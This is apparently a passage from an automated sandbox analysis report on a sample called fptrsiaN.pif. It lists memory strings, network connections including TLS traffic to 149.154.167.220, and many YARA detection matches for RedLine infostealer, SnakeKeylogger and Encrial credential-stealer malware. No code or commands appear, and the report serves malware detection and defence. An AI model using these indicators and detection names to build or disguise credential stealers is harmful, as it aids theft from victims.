fptrsiaN.pif, 0000000F.00000002.3005124435.00000000323B0000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032285000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: fptrsiaN.pif, 00000006.00000002.3003869712.000000001E626000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E5F4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.00000000230E4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000023116000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032476000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032444000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: fptrsiaN.pif, 00000006.00000002.3003869712.000000001E626000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 00000006.00000002.3003869712.000000001E5F4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.00000000230E4000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3005350345.0000000023116000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032476000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3005124435.0000000032444000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: fptrsiaN.pif, 0000000F.00000002.3001337682.00000000312FB000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000311F8000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000312EC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: fptrsiaN.pif, 00000006.00000002.3000201227.000000001D482000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021F5F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/Lz
Source: fptrsiaN.pif, 00000006.00000002.3000201227.000000001D473000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/hy
Source: fptrsiaN.pif, 00000006.00000002.3000201227.000000001D47D000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021F5A000.00000004.00000800.00020000.00000000.sdmp, fptrsiaN.pif, 0000000F.00000002.3001337682.00000000312F6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB
Source: fptrsiaN.pif, 0000000A.00000002.3001487610.0000000021F50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/p

Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49788 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 49756 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49792 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 6.2.fptrsiaN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.2.fptrsiaN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 15.1.fptrsiaN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 15.2.fptrsiaN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.2.x.exe.213963a8.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 15.2.fptrsiaN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 6.1.fptrsiaN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 1.2.x.exe.213d31d8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.2.fptrsiaN.pif.242d0000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.fptrsiaN.pif.242d0000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.fptrsiaN.pif.242d0000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.Naisrtpf.PIF.210cab18.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 15.1.fptrsiaN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 9.2.Naisrtpf.PIF.210cab18.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 6.2.fptrsiaN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 6.2.fptrsiaN.pif.1ce59d46.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.fptrsiaN.pif.1ce59d46.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.fptrsiaN.pif.1ce59d46.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.3.fptrsiaN.pif.1b2ec7f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.3.fptrsiaN.pif.1b2ec7f8.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.3.fptrsiaN.pif.1b2ec7f8.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.3.fptrsiaN.pif.1b2ec7f8.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.fptrsiaN.pif.33bf0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.fptrsiaN.pif.33bf0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.fptrsiaN.pif.33bf0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.fptrsiaN.pif.21b5ac4e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.fptrsiaN.pif.1ff40000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.fptrsiaN.pif.1ce59d46.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.2.fptrsiaN.pif.1ce5ac4e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.fptrsiaN.pif.1ce5ac4e.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.fptrsiaN.pif.1ce5ac4e.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.fptrsiaN.pif.21b59d46.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.fptrsiaN.pif.21b59d46.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.fptrsiaN.pif.21b59d46.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.fptrsiaN.pif.30c0ac4e.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.fptrsiaN.pif.30c0ac4e.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.fptrsiaN.pif.30c0ac4e.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.fptrsiaN.pif.335a0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.fptrsiaN.pif.335a0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.fptrsiaN.pif.335a0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.fptrsiaN.pif.33bf0000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.fptrsiaN.pif.33bf0000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.fptrsiaN.pif.33bf0000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.fptrsiaN.pif.335a0f08.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.fptrsiaN.pif.335a0f08.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.fptrsiaN.pif.335a0f08.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.fptrsiaN.pif.1f6e0f08.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.x.exe.213963a8.6.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.2.fptrsiaN.pif.24330000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.fptrsiaN.pif.24330000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.fptrsiaN.pif.24330000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.1.fptrsiaN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.2.fptrsiaN.pif.242d0f08.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.fptrsiaN.pif.242d0f08.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.fptrsiaN.pif.242d0f08.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.2.fptrsiaN.pif.1ff40000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.fptrsiaN.pif.1ff40000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.fptrsiaN.pif.1ff40000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.fptrsiaN.pif.242d0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.fptrsiaN.pif.242d0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.fptrsiaN.pif.242d0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.1.fptrsiaN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 10.3.fptrsiaN.pif.1ffcda28.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.3.fptrsiaN.pif.1ffcda28.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.3.fptrsiaN.pif.1ffcda28.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.fptrsiaN.pif.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 6.2.fptrsiaN.pif.1f6e0000.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.fptrsiaN.pif.1f6e0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.fptrsiaN.pif.1f6e0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 9.2.Naisrtpf.PIF.21107948.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 6.2.fptrsiaN.pif.1f6e0f08.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.fptrsiaN.pif.1f6e0f08.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.fptrsiaN.pif.1f6e0f08.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.fptrsiaN.pif.30c09d46.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.fptrsiaN.pif.30c09d46.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.fptrsiaN.pif.30c09d46.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.fptrsiaN.pif.335a0000.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.fptrsiaN.pif.335a0000.4.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.fptrsiaN.pif.335a0000.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.fptrsiaN.pif.24330000.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.fptrsiaN.pif.24330000.5.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.fptrsiaN.pif.24330000.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.fptrsiaN.pif.335a0f08.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.fptrsiaN.pif.335a0f08.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.fptrsiaN.pif.335a0f08.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.fptrsiaN.pif.21b5ac4e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.fptrsiaN.pif.21b5ac4e.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.1.fptrsiaN.pif.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.fptrsiaN.pif.242d0f08.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.fptrsiaN.pif.242d0f08.3.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.fptrsiaN.pif.242d0f08.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.fptrsiaN.pif.21b5ac4e.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.fptrsiaN.pif.1f6e0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.fptrsiaN.pif.30c0ac4e.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.3.fptrsiaN.pif.1ffcda28.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.fptrsiaN.pif.21b59d46.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.fptrsiaN.pif.21b59d46.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.fptrsiaN.pif.21b59d46.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.3.fptrsiaN.pif.2f0fd950.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.3.fptrsiaN.pif.2f0fd950.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.3.fptrsiaN.pif.2f0fd950.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.2.fptrsiaN.pif.30c09d46.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.2.fptrsiaN.pif.30c09d46.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.2.fptrsiaN.pif.30c09d46.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.fptrsiaN.pif.1ce5ac4e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 15.3.fptrsiaN.pif.2f0fd950.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000A.00000001.1837489352.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 00000006.00000002.3009855324.000000001F6E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000A.00000002.3012271935.00000000242D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000006.00000003.1724265899.000000001B2EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.3000473987.0000000021B19000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000F.00000003.1916140937.000000002F0FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0000000F.00000002.3012935219.0000000033BF0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000A.00000003.1840988876.000000001FFCD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000006.00000002.2971941444.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000F.00000001.1912204476.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000F.00000002.2971881656.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000006.00000001.1720780507.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0000000A.00000002.3012481988.0000000024330000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
